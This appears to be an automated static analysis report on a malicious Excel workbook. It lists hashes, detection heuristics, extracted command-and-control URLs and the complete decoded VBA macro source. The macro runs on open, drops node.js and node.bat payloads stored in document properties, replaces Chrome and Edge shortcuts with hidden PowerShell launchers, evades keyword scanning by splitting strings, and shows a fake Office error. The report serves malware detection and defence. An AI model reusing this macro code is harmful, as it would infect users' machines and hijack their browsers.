Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 9f603469f9245d35…

MALICIOUS

Office (OLE) / .XLS

Size: 55.5 KB
Created: 2015-06-05 18:17:20
Authoring application: Microsoft Excel
First seen: 2026-06-19
MD5: ff589ad8d1c8609a74fc6b16849c7db2
SHA-1: 496b87113f5fd6997a272bcfb1c443d60f9b9fc0
SHA-256: 9f603469f9245d350560736676aaadf64b0c7835ba3a4bb6d3a9189ceb88d613
Risk Score: 318

Heuristics 10

  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        targetPath = "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
        Set WshShell = CreateObject("WScr" + "ipt.Sh" + "ell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set WshShell = CreateObject("WScr" + "ipt.Sh" + "ell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        uname = Environ("USERNAME")
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • URL: http://api-instance.btobwah.com/mode/scripts/get_comm_re.php
      Channel: In document text (OLE body)
    • URL: http://api-instance.btobwah.com/mode/scripts/api.php?action=Fcnn&instance_name=
      Channel: In document text (OLE body)
    • URL: http://api-instance.btobwah.com/
      Channel: In document text (OLE body)
    • URL: https://nodejs.org/download/release/latest-v22.x/win-x86/node.exe
      Channel: In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10516 bytes
SHA-256: e6fd548db70cd7fcf96f7e9380863b016efdc8cb0d89dfee67deca1e622817b3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public chrome As Integer
Public msedge As Integer
Public cam As Integer
Public ctPath As String
Public mtPath As String

Sub ShowWMessage()
    Dim message As String
    Dim title As String
    message = "Office has detected a problem whit this file. To help protect your computer this file cannot be opened."
    title = "Microsoft Excel"
    MsgBox message, vbExclamation, title
End Sub

Sub CreateRecursiveFolder_MkDir()
    Dim path As String
    Dim folders() As String
    Dim currentPath As String
    Dim i As Integer
    Dim uname As String
    uname = Environ("USERNAME")
    path = "\.node\bin\"
    folders = Split(path, "\")
    currentPath = "c:\users\" + uname
    
    For i = LBound(folders) To UBound(folders)
        currentPath = IIf(currentPath = "", folders(i), currentPath & "\" & folders(i))
        
        If Dir(currentPath, vbDirectory) = "" Then
            MkDir currentPath
        End If
    Next i
    
End Sub


Sub ESBFCtots()
    Dim fileComment As String
    Dim byteArray() As Byte
    Dim extractedBytes() As Byte
    Dim filePath As String
    Dim fileNumber As Integer
    Dim startByte As Long
    Dim byteCount As Long
    Dim uname As String
    Dim i As Long
    
    Call CreateRecursiveFolder_MkDir
    uname = Environ("USERNAME")
    fileComment = ThisWorkbook.BuiltinDocumentProperties("Title")
    
    If Len(fileComment) = 0 Then
        Exit Sub
    End If
    
    byteArray = StringToByteArray(fileComment)
    
    startByte = 1
    byteCount = 3877
    
    If startByte + byteCount - 1 > UBound(byteArray) Then
        Exit Sub
    End If
    
    ReDim extractedBytes(byteCount - 1)
    For i = 0 To byteCount - 1
        extractedBytes(i) = byteArray(startByte + i - 1)
    Next i
    
    For i = 0 To UBound(extractedBytes)
        If extractedBytes(i) = &HDF Then
            extractedBytes(i) = &H0
        End If
    Next i
    
    filePath = "C:\Users\" + uname + "\.node\bin\node.js"

    fileNumber = FreeFile
    Open filePath For Binary Access Write As #fileNumber
        Put #fileNumber, , extractedBytes
    Close #fileNumber
    
End Sub

Sub BFtodoc()
    Dim fileComment As String
    Dim byteArray() As Byte
    Dim extractedBytes() As Byte
    Dim filePath As String
    Dim fileNumber As Integer
    Dim startByte As Long
    Dim byteCount As Long
    Dim i As Long
    
    fileComment = ThisWorkbook.BuiltinDocumentProperties("Comments")
    
    If Len(fileComment) = 0 Then
        Exit Sub
    End If
    
    byteArray = StringToByteArray(fileComment)
    
    startByte = 1
    byteCount = 357
    
    If startByte + byteCount - 1 > UBound(byteArray) Then
        Exit Sub
    End If
    

    ReDim extractedBytes(byteCount - 1)
    For i = 0 To byteCount - 1
        extractedBytes(i) = byteArray(startByte + i - 1)
    Next i
    

    For i = 0 To UBound(extractedBytes)
        If extractedBytes(i) = &HDF Then
            extractedBytes(i) = &H0
        End If
    Next i
    
    filePath = "C:\Users\Public\Documents\node.bat"

    fileNumber = FreeFile
    Open filePath For Binary Access Write As #fileNumber
        Put #fileNumber, , extractedBytes
    Close #fileNumber

End Sub


Function StringToByteArray(str As String) As Byte()
    Dim i As Integer
    Dim byteArray() As Byte
    ReDim byteArray(Len(str) - 1)
    
    For i = 1 To Len(str)
        byteArray(i - 1) = Asc(Mid(str, i, 1))
    Next i
    
    StringToByteArray = byteArray
End Function

Sub MDFWithS(ByVal dfPath As String)
    Dim WshShell As Object
    Dim shortcut As Object
    Dim targetPath As String
    Dim arguments As String
    targetPath = "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    arguments = "-w 1 -c ""saps '" + mtPath + "';C:\Users\Public\Documents\node.bat"""
    Set WshShell = CreateObject("WScr" + "ipt.Sh" + "ell")
    Set shortcut = WshShell.CreateShortcut(dfPath)
    shortcut.targetPath = targetPath
    shortcut.arguments = arguments
    shortcut.IconLocation = mtPath
    shortcut.windowStyle = 7
    shortcut.Save
End Sub

Sub CDFWithS(ByVal dfPath As String)
    Dim WshShell As Object
    Dim shortcut As Object
    Dim targetPath As String
    Dim arguments As String
    targetPath = "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    arguments = "-w 1 -c ""saps '" + ctPath + "';C:\Users\Public\Documents\node.bat"""
    Set WshShell = CreateObject("WScr" + "ipt.Sh" + "ell")
    Set shortcut = WshShell.CreateShortcut(dfPath)
    shortcut.targetPath = targetPath
    shortcut.arguments = arguments
    shortcut.IconLocation = ctPath
    shortcut.windowStyle = 7
    shortcut.Save
End Sub


Function FileExists(ByVal filePath As String) As Boolean
    FileExists = (Dir(filePath) <> "")
End Function

Sub DFL(ByVal lPath As String)
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    fso.DeleteFile lPath, True
    Set fso = Nothing
End Sub

Function dlkfo(ByVal fg As Integer)
    Dim lps1 As String
    Dim lps2 As String
    Dim lps3 As String
    Dim lps4 As String
    Dim lps33 As String
    Dim lps333 As String
    Dim lps44 As String
    Dim lps444 As String
    Dim lps5 As String
    Dim lps6 As String
    Dim lps7 As String
    Dim lps8 As String
    Dim smpth As String
    Dim sgpth As String
    Dim userName As String
    userName = Environ("USERNAME")
    lps1 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk"
    lps2 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk"
    lps3 = "c:\Users\" + userName + "\Desktop\Google Chrome.lnk"
    lps4 = "c:\Users\" + userName + "\Desktop\Microsoft Edge.lnk"
    lps33 = "c:\Users\Public\Desktop\Google Chrome.lnk"
    lps44 = "c:\Users\Public\Desktop\Microsoft Edge.lnk"
    lps333 = "c:\Users\" + userName + "\Desktop\chrome - Shortcut.lnk"
    lps444 = "c:\Users\" + userName + "\Desktop\msedge - Shortcut.lnk"
    lps5 = "c:\Users\" + userName + "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk"
    lps6 = "c:\Users\" + userName + "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk"
    lps7 = "c:\Users\" + userName + "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk"
    lps8 = "c:\Users\" + userName + "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk"
    
    If fg = 1 Then
        If FileExists(lps1) Then
            Call DFL(lps1)
        End If
        If FileExists(lps3) Then
            Call CDFWithS(lps3)
        End If
        If FileExists(lps33) Then
            Call DFL(lps33)
            Call CDFWithS(lps3)
        End If
        If FileExists(lps333) Then
            Call CDFWithS(lps333)
        End If
        If FileExists(lps5) Then
            Call CDFWithS(lps5)
        End If
        If FileExists(lps7) Then
            Call CDFWithS(lps7)
        End If
    ElseIf fg = 2 Then
        If FileExists(lps2) Then
            Call DFL(lps2)
        End If
        If FileExists(lps4) Then
            Call MDFWithS(lps4)
        End If
        If FileExists(lps44) Then
            Call DFL(lps44)
            Call MDFWithS(lps4)
        End If
        If FileExists(lps444) Then
            Call MDFWithS(lps444)
        End If
        If FileExists(lps6) Then
            Call MDFWithS(lps6)
        End If
        If FileExists(lps8) Then
            Call MDFWithS(lps8)
        End If
    ElseIf fg = 3 Then
        If FileExists(lps1) Then
            Call DFL(lps1)
        End If
        If FileExists(lps3) Then
            Call CDFWithS(lps3)
        End If
        If FileExists(lps33) Then
            Call DFL(lps33)
            Call CDFWithS(lps3)
        End If
        If FileExists(lps333) Then
            Call CDFWithS(lps333)
        End If
        If FileExists(lps5) Then
            Call CDFWithS(lps5)
        End If
        If FileExists(lps7) Then
            Call CDFWithS(lps7)
        End If
        
        If FileExists(lps2) Then
            Call DFL(lps2)
        End If
        If FileExists(lps4) Then
            Call MDFWithS(lps4)
        End If
        If FileExists(lps44) Then
            Call DFL(lps44)
            Call MDFWithS(lps4)
        End If
        If FileExists(lps444) Then
            Call MDFWithS(lps444)
        End If
        If FileExists(lps6) Then
            Call MDFWithS(lps6)
        End If
        If FileExists(lps8) Then
            Call MDFWithS(lps8)
        End If
        
    End If
End Function

Sub TestFileExists()
    Dim c1 As String
    Dim c2 As String
    Dim m1 As String
    Dim m2 As String
    c1 = "C:\Program Files\Google\Chrome\Application\chrome.exe"
    c2 = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
    m1 = "C:\Program Files\Microsoft\Edge\Application\msedge.exe"
    m2 = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    
    If FileExists(c1) Then
        chrome = 1
        ctPath = c1
    ElseIf FileExists(c2) Then
        chrome = 1
        ctPath = c2
    Else
        chrome = 0
    End If
    
    If FileExists(m1) Then
        msedge = 2
        mtPath = m1
    ElseIf FileExists(m2) Then
        msedge = 2
        mtPath = m2
    Else
        msedge = 0
    End If
    
    cam = chrome + msedge
    If cam = 0 Then
        Call ShowWMessage
        Exit Sub
    Else
        Call dlkfo(cam)
        Call ESBFCtots
        Call BFtodoc
        Call ShowWMessage
    End If
End Sub


Private Sub Workbook_Open()
    Call TestFileExists
End Sub




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True